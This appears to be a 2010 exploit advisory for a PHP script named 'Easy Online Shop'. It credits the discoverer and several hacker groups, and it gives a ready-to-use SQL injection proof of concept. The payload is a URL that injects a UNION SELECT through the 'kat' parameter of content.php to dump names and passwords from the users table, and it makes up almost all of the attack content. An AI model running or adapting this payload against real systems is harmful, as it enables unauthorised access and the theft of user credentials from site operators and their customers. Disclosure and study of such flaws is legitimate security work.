----------------------------Information------------------------------------------------ +Name : Easy Online Shop <=SQL injection Vulnerability Proof of Concept +Autor : Easy Laster +Date : 17.12.2010 +Script: Easy Online Shop +Vendor : http://www.mhproducts.de/ +Price : 8,90 +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project.com +Greetz to Team-Internet ,Underground Agents and free-hack.com +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_| |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Proof of Concept +Table : users +columns : name,password +Proof of Concept : http://server/easyonlineshop/content.php?kat='+union+select+1 ,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--+ ----------------------------------------------------------------------------------------
体验盒子
